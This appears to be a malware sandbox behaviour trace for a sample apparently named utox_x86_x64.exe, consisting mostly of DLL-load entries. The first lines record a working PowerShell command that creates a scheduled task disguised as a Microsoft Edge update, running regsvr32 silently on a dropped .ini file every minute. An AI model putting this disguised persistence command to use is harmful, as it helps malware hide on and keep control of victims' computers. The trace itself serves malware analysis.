Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: quartz.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dsound.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: qedit.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devenum.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msdmo.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wudfplatform.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: msimg32.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: winmm.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: profapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: schannel.dll
